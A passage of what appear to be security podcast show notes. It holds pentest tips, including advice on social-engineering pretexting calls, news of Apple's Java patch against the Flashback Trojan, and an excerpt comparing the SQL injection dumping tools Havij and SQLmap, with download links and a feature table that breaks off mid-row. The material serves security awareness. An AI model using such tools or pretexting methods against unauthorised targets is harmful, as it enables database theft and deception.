<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;">&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Pentest Lessons</span></p>
<ol style="margin-top:0pt;margin-bottom:0pt;">
<li style="list-style-type:decimal;font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Do not expect your program to work if you are coding while drinking whiskey! #whiskey_and_coding_do_not_mix</span></p>
</li>
<li style="list-style-type:decimal;font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">No matter how good you think you are, NEVER tell a customer that you will find ALL of their vulnerabilities or ALL of the &quot;ways in&quot;.</span></p>
</li>
<li style="list-style-type:decimal;font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">If you setup a &quot;special&quot; website for a phishing exercise, shut down the website once the exercise is finished.</span></p>
</li>
<li style="list-style-type:decimal;font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When making social engineering pretexting calls, you should know the full names, geographic locations, and NATIVE LANGUAGES of the targets.</span></p>
</li>
<li style="list-style-type:decimal;font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Pentest != (run vulnerability scanner of choice, load into Metasploit, autopwn) &#8230; And yes I know that autopwn has been deprecated <img src='http://www.isdpodcast.com/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> </span></p>
</li>
</ol>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Quick shoutout to Adrian Sanabria for updating his blog based on our discussions and questions on yesterday&rsquo;s episode. Head over to his blog (</span><a href="http://averysawaba.blogspot.com/"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://averysawaba.blogspot.com</span></a><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">) to read more.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.macworld.com/article/1166195/apple_releases_java_security_updates.html"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.macworld.com/article/1166195/apple_releases_java_security_updates.html</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">It&rsquo;s probably safe to turn your Mac on again. Just a day after reports spread about a Java-based Trojan horse that could install itself on your Mac without requiring that you enter a password, Apple has released</span><a href="http://support.apple.com/kb/HT5228?viewlocale=en_US&amp;locale=en_US"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> Java for OS X Lion 2012-001 and Java for Mac OS X 10.6 Update 7</span></a><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The updates, which are available for Mac OS X 10.6.8 Snow Leopard and 10.7.3 Lion (including both OS&rsquo;s Server editions), patch multiple vulnerabilities in Java 1.6.0_29&mdash;including some that could allow malicious code to run on your Mac outside of the Java sandbox, triggered merely by your visiting a webpage containing the right nefarious code.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">For full details on the update, Apple points</span><a href="http://www.oracle.com/technetwork/java/javase/releasenotes-136954.html"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> to Oracle</span></a><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">. &nbsp;The update patches no fewer than a dozen vulnerabilities, including the one exploited most recently in the newly-discovered Flashback Trojan horse variant.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://blog.imperva.com/2012/04/dissecting-the-sql-injection-tools-used-by-hackers.html"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blog.imperva.com/2012/04/dissecting-the-sql-injection-tools-used-by-hackers.html</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Recently, during a presentation to a group of security professionals, an impromptu poll was taken asking attendees whether they were familiar with</span><a href="http://blog.imperva.com/2012/03/havij-101.html"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> Havij</span></a><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, a SQL injection tool used heavily in the hacking community. &nbsp;Out of a crowd of around 60 people, only two people were familiar with it. &nbsp;Though not a scientific, statistically valid survey, the result is spooky. &nbsp;It&rsquo;s kind of like going to fight in the mountains of Afghanistan and not knowing what an AK-47 is.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">If you&rsquo;ve wondered why, as the most recent Verizon report shows, the main attack vector is web applications, knowing SQL injections tools hackers deploy to take data is vital. &nbsp;Here&rsquo;s what every security professional should know.</span></p>
<ul style="margin-top:0pt;margin-bottom:0pt;">
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Vulnerability scanners: &nbsp;Vulnerability scanners find an initial SQL injection vulnerability. &nbsp;However, these tools stop short of actually exploiting the vulnerability. &nbsp;In other words, they highlight a potential vulnerability but don&rsquo;t actually extract the data. &nbsp;From a hacker&rsquo;s perspective, they provide a list of likely targets. In this group we can find all kinds of vulnerability scanners which include:</span></p>
<ul style="margin-top:0pt;margin-bottom:0pt;">
<li style="list-style-type:circle;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Acunetix</span></p>
</li>
<li style="list-style-type:circle;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">W3af</span></p>
</li>
<li style="list-style-type:circle;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Netsparker </span></p>
</li>
<li style="list-style-type:circle;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Webinspect</span></p>
</li>
<li style="list-style-type:circle;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Appscan </span></p>
</li>
<li style="list-style-type:circle;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Whitehat</span></p>
</li>
<li style="list-style-type:circle;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">And the list goes on. </span></p>
</li>
</ul>
</li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SQL injection dumping tools: &nbsp;Given a potentially SQL injection vulnerability, these tools expand the small hole to a major breach to leak all database content. This market is ruled by two main packages:</span></p>
<ul style="margin-top:0pt;margin-bottom:0pt;">
<li style="list-style-type:circle;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Havij -</span><a href="http://itsecteam.com/en/projects/project1.htm"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> http://itsecteam.com/en/projects/project1.htm</span></a></p>
</li>
<li style="list-style-type:circle;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SQLmap &ndash;</span><a href="http://sqlmap.sourceforge.net/"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> http://sqlmap.sourceforge.net/</span></a></p>
</li>
<li style="list-style-type:circle;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">There are some other much smaller &ldquo;players&rdquo; (e.g., </span><a href="http://trac.webhackblog.com/browser/Perl/SQLi/ssdp/README.txt"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">SSDP</span></a><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> or </span><a href="http://www.0x90.org/releases/absinthe/index.php"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Absinthe</span></a><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">). &nbsp;Considering there are two main players, we&rsquo;ll focus on Havij and SQLmap. </span></p>
</li>
</ul>
</li>
</ul>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">For more, here&rsquo;s a YouTube movie showing both tools: </span><a href="http://www.youtube.com/watch?v=GOvRAJBbRnk"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">&nbsp;http://www.youtube.com/watch?v=GOvRAJBbRnk</span></a><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">To date, here&rsquo;s how Havij and SQLmap currently stack up:</span></p>
<div dir="ltr">
<table style="border:none;border-collapse:collapse">
<colgroup>
<col width="99" />
<col width="262" />
<col width="262" /></colgroup>
<tbody>
<tr style="height:0px">
<td style="border:1px dotted #aaa;vertical-align:top;padding:7px 7px 7px 7px">
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;">&nbsp;</p>
</td>
<td style="border:1px dotted #aaa;vertical-align:top;padding:7px 7px 7px 7px">
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Havij</span></p>
</td>
<td style="border:1px dotted #aaa;vertical-align:top;padding:7px 7px 7px 7px">
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SQLmap</span></p>
</td>
</tr>
<tr style="height:0px">
<td style="border:1px dotted #aaa;vertical-align:top;padding:7px 7px 7px 7px">
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Code</span></p>
</td>
<td style="border:1px dotted #aaa;vertical-align:top;padding:7px 7px 7px 7px">
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Commercial/Proprietary</span></p>
</td>
<td style="border:1px dotted #aaa;vertical-align:top;padding:7px 7px 7px 7px">
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Open source</span></p>
</td>
</tr>
<tr style="height:0px">
<td style="border:1px dotted #aaa;vertical-align:top;padding:7px 7px 7px 7px">
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">OS support</span></p>
</td>
<td style="border:1px dotted #aaa;vertical-align:top;padding:7px 7px 7px 7px">
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Windows</span></p>
</td>
<td style="border:1px dotted #aaa;vertical-align:top;padding:7px 7px 7px 7px">
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Every OS running Python</span></p>
</td>
</tr>
<tr style="height:0px">
<td style="border:1px dotted #aaa;vertical-align:top;padding:7px 7px 7px 7px">
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Form</span></p>
</td>
<td style="border:1px dotted #aaa;vertical-align:top;padding:7px 7px 7px 7px">
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Installer</span></p>
</td>
<td style="border:1px dotted #aaa;vertical-align:top;padding:7px 7px 7px 7px">
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Python code</span></p>
</td>
</tr>
<tr style="height:0px">
<td style="border:1px dotted #aaa;vertical-align:top;padding:7px 7px 7px 7px">
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">UI</span></p>
</td>
<td style="border:1px dotted #aaa;vertical-align:top;padding:7px 7px 7px 7px">
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Graphic (GUI)</span></p>
</td>
<td style="border:1px dotted #aaa;vertical-align:top;padding:7px 7px 7px 7px">
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Command line</span></p>
</td>
</tr>
<tr style="height:0px">
<td style="border:1px dotted #aaa;vertical-align:top;padding:7px 7px 7px 7px">
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Supported DBs</span></p>
</td>
<td style="border:1px dotted #aaa;vertical-align:top;padding:7px 7px 7px 7px">
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, Sybase </span></p>
</td>
<td style="border:1px dotted #aaa;vertical-align:top;padding:7px 7px 7px 7px">
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, SQLite,Firebird, Sybase, SAP MaxDB</span></p>
</td>
</tr>
<tr style="height:0px">
<td style="border:1px dotted #aaa;vertical-align:top;padding:7px 7px 7px 7px">
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Last updated</span></p>
</td>
<td style="border:1px dotted #aaa;vertical-align:top;padding:7px 7px 7px 7px">
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">22.6.11</span></p>
</td>
<td style="border:1px dotted #aaa;vertical-align:top;padding:7px 7px 7px 7px">
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">29.3.12</span></p>
</td>
</tr>
<tr style="height:0px">
<td style="border:1px dotted #aaa;vertical-align:top;padding:7px 7px 7px 7px">
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Password cracking</span></p>
</td>
<td style="border:1px dotted #aaa;vertical-align:top;padding:7px 7px 7px 7px">
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Supported</span></p>
</td>
<td style="border:1px dotted #aaa;vertical-align:top;padding:7px 7px 7px 7px">
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">supported</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;">&nbsp;</p>
</td>
</tr>
<tr style="height:0px">
<td style="border:1px dotted #aaa;vertical-align:top;padding:7px 7px 7px 7px">
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Customizable DB dump</span></p>
</td>
<td style="border:1px dotted #aaa;vertical-align:top;padding:7px 7px 7px 7px">
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Supported</span></p>
</td>
<td style="border:1px dotted #aaa;vertical-align:top;padding:7px 7px 7px 7px">
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Supported</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;">&nbsp;</p>
</td>
</tr>
<tr style="height:0px">
<td style="border:1px dotted #aaa;vertical-align:top;padding:7px 7px 7px 7px">
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Execute arbitrary DB commands</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;">&nbsp;</p>
</td>
<td style="border:1px dotted #aaa;vertical-align:top;padding:7px 7px 7px 7px">
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Supported</span></p>
</td>
<td style="border:1px dotted #aaa;vertical-align:top;padding:7px 7px 7px 7px">
